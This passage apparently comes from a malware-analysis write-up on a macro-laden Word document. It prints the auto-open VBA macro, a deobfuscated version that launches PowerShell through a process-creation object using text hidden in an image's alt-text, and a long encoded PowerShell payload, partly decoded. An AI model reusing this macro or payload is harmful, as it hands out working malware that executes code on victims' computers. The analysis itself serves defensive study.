dYvJsnjw = Mid _
(T9s69dfveqqh1ef5nq, 212, 1)
BiHOVG = Mid _
(Mxpn2nii2x7, 35, 1)
GQJzwq = Mid _
(X9bz6a6f43_hta5ln, 34, 1)
WKcaSvfi = Mid _
(Fuxrbkmu2s17p0j, 9, 1)
lsFUF = Mid _
(Okzpk4tkizyh62u, 240, 1)
VAwYHAcv = Mid _
(Weplip72nljnq8na09, 20, 1)
hNfbEKURZVE = Mid _
(Ox9mobnimxe1_9, 179, 1)
wYVOV = Mid _
(Alt9nfo0b_tg5lmxi, 190, 1)
mLdZb = Mid _
(Hak93bk7htdjvkpy8c, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Bvlfz7n67t8aa75, 33, 1)
zmlHaKIVkFA = Mid _
(Ysctrxs9764oj2fp, 168, 1)
UCPVYn = Mid _
(Dhl_7wcpgpmks, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(J3vsg6taodn, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function
And within the other stream (-s 13) I saw how the macro kicks off – when the Word doc is opened and the macro is run (auto_open).
herbie$ ./oledump.py -v -s 13 LRE-090120\ JYW-092120.doc Attribute VB_Name = "V216c23yqw7e5o2v" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() P72j6t412f1985pd6 = Array(J0uidqx1c0a3u + "Th1h6l0aavkju7xS367iljm3kweq5z0v E1eiiunn0096" + Tdkjj9ylr9nquz5ug8, Rn29ystlt6mlp, Uoepmfd2vqk2.Cbzdhgt82a6foxc53q, K7bfvpb88z323z6t43 + "Pgtagw22wfq Q9sf54owsl3 Bf925racvi5276 N6yp3qvf4kub2oguk") End Sub
Looking at this line, it looks like it is building an array of values to execute the macro. The interesting thing is that none of the values are found in the script (that I could tell) with the exception of “Uoepmfd2vqk2.Cbzdhgt82a6foxc53q” which points to the main function of the script. If I had to hazard a guess, I would say that the other values are just garbage values to help obfuscate the code.
After a while of looking at the script and seeing what lines were valid and which were garbage, there was one thing that stood out to me – the lines to keep were all right before the statement of “Set nnnnnnnnn = Languages.” Once I noticed that, it made cleaning up the script much easier. The following is the script cleaned up.
Function Cbzdhgt82a6foxc53q() On Error Resume Next Quuseim6entz = 90 Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25)) Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq," Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6) Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p) Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj) Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel End Function Function Zk46e7c8d40(G7b_e54iwh7id_) On Error Resume Next X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_) Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,") B4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1) Zk46e7c8d40 = B4ru9eb_hhowd End Function Function Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2) On Error Resume Next Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2) showwindow = wdKeyEquals - wdKeyEquals End Function Function Qfyk87zgdp86ufle() On Error Resume Next Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$ Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis) End Function
With the script shortened, it was pretty straight forward walking through it and tracing when a function got called and what parameters were passed with it. I had not seen the CleanString method to remove any non-printable spaces before the Join function before. I also was able to use the trick of opening the Word doc up (but not enabling the macro) and pressing ALT-F11 to open the VB for Applications window to see what all was there. I did notice that there was a form there with different values assigned to the “Text” property of the object.
The interesting bit for me about this script, and the main impetus for this write up, was based around this line:
Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$
Looking up what “Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText” pointed me to docs and tips about how to add an alternative text to a shape, or object in an Office doc either in the GUI or via code in VB. Seeing that there was only 1 image in the Word doc, I opened the properties of the image and looked at the alt-text tab there and got the following:
The following is the string of characters found in the alt-text:
g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9
Hrmm. Interesting to say the least considering that there is a method to remove (or split) the characters of “g,bq” after cleaning up all non-printable characters. Once I got rid of those characters, I was left with the following string:
,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9
Now I see what is going on – we have a long base64 encoded string for Powershell. The thing that I found odd was that it ended at the character ‘9.’ Decoding that string gave me the following code:
$Uevwzgz=((B+knt)+(45+p)); &(ne+w-it+em) $ENV:usErprOFile\yv3Wm9g\wZN78e8\ -itemtype dIReCToRy; [Net.ServicePointManager]::"SECUrITYPROtOCol" = ((tls+12,)+ t+(l+s11, t)+l+s); $Q3ywioo = ((T+ii)+(0+bc)+p); $Efe5qz9=(W+(z+5d4)+4e); $Bnp_s5v=$env:userprofile+(((g+QWY+v3)+w+m+9g+(gQ+W)+(Wz+n7)+8e+(8gQ+W))."replAce"(([ChAr]103+[ChAr]81+[ChAr]87),[sTRING][ChAr]92))+$Q3ywioo+(.+(ex+e)); $Xstbuxr
Clearly there had to be more to this than that. Unfortunately I was not able to find anything else. I ended up running the sample on my Windows VM and could see that the base64 string was longer than what I had here so I knew that I was missing something. It was then that I had remembered using Didier’s ‘strings.py’ script. I love using this script since I can use the flag of ‘-L’ and have the output sorted from shortest string to the longest string. When I went back and looked at the output it was here that I noticed where the rest of the base64 script was. The following was split into 2 sections (basically duplicated) when looking at it in strings.py:
g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9ACg, bq,gAKg, bq,AAng, bq,AEcg, bq,AZAg, bq,AnAg, bq,CsAg, bq,JwBg, bq,lACg, bq,cAKg, bq,QArg, bq,ACgg, bq,AJwg, bq,B5Ag, bq,DcAg, bq,MAAg, bq,nACg, bq,sAJg, bq,wA5g, bq,ACcg, bq,AKQg, bq,ApAg, bq,DsAg, bq,JABg, bq,UAHg, bq,IANg, bq,wB5g, bq,ADAg, bq,AZQg, bq,BnAg, bq,D0Ag, bq,JgAg, bq,oACg, bq,cAbg, bq,gBlg, bq,AHcg, bq,ALQg, bq,BvAg, bq,GIAg, bq,agAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AGMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dAAg, bq,nACg, bq,kAIg, bq,ABOg, bq,AEUg, bq,AVAg, bq,AuAg, bq,FcAg, bq,ZQBg, bq,iAEg, bq,MAbg, bq,ABpg, bq,AGUg, bq,Abgg, bq,B0Ag, bq,DsAg, bq,JABg, bq,DAHg, bq,gAZg, bq,QBhg, bq,AGsg, bq,Acgg, bq,BxAg, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAag, bq,AAng, bq,ACsg, bq,AJwg, bq,B0Ag, bq,HQAg, bq,JwAg, bq,rACg, bq,cAcg, bq,AA6g, bq,AC8g, bq,ALwg, bq,BoAg, bq,GEAg, bq,eQAg, bq,nACg, bq,sAJg, bq,wBtg, bq,AGUg, bq,AdAg, bq,BlAg, bq,HQAg, bq,cgAg, bq,nACg, bq,sAJg, bq,wBhg, bq,AGQg, bq,AaQg, bq,BuAg, bq,GcAg, bq,LgAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,AYwg, bq,BvAg, bq,G0Ag, bq,JwAg, bq,rACg, bq,cALg, bq,wB3g, bq,AHAg, bq,ALQg, bq,BpAg, bq,G4Ag, bq,JwAg, bq,rACg, bq,cAYg, bq,wBsg, bq,AHUg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZABg, bq,lACg, bq,cAKg, bq,QArg, bq,ACgg, bq,AJwg, bq,BzAg, bq,CcAg, bq,KwAg, bq,nACg, bq,8Aeg, bq,QBHg, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,RQBg, bq,MACg, bq,cAKg, bq,wAog, bq,ACcg, bq,ASwg, bq,BqAg, bq,CcAg, bq,KwAg, bq,nADg, bq,QALg, bq,wAqg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GgAg, bq,dABg, bq,0AHg, bq,AAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,A6Ag, bq,CcAg, bq,KwAg, bq,oACg, bq,cALg, bq,wAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,HMAg, bq,JwAg, bq,pACg, bq,sAJg, bq,wBpg, bq,AG0g, bq,AJwg, bq,ArAg, bq,CcAg, bq,bwAg, bq,nACg, bq,sAJg, bq,wBmg, bq,AGYg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,IAJg, bq,wArg, bq,ACcg, bq,AYgg, bq,BkAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAyg, bq,ADQg, bq,ALgg, bq,AnAg, bq,CsAg, bq,JwBg, bq,jAGg, bq,8Abg, bq,QAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,LwBg, bq,3ACg, bq,cAKg, bq,wAng, bq,AHAg, bq,ALQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBug, bq,AGMg, bq,AbAg, bq,B1Ag, bq,CcAg, bq,KwAg, bq,nAGg, bq,QAZg, bq,QAng, bq,ACkg, bq,AKwg, bq,AnAg, bq,HMAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wAvg, bq,AGYg, bq,AJwg, bq,ArAg, bq,CcAg, bq,cwBg, bq,pAFg, bq,EAYg, bq,wAng, bq,ACkg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,KgAg, bq,nACg, bq,sAJg, bq,wBog, bq,AHQg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0AHg, bq,AAOg, bq,gAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,NAAg, bq,wADg, bq,EAag, bq,wBwg, bq,AGwg, bq,AYQg, bq,AnAg, bq,CsAg, bq,JwBg, bq,uACg, bq,cAKg, bq,wAng, bq,AHMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,aQBg, bq,uAGg, bq,YAbg, bq,wAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,LgBg, bq,jAGg, bq,8AJg, bq,wArg, bq,ACcg, bq,AbQg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cALg, bq,wBjg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GcAg, bq,aQAg, bq,nACg, bq,kAKg, bq,wAng, bq,AC0g, bq,AYgg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,kAbg, bq,gAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,EsAg, bq,JwAg, bq,rACg, bq,cAdg, bq,ABGg, bq,AFIg, bq,Aawg, bq,AvAg, bq,CoAg, bq,JwAg, bq,rACg, bq,cAag, bq,AB0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0ACg, bq,cAKg, bq,wAng, bq,AHAg, bq,AOgg, 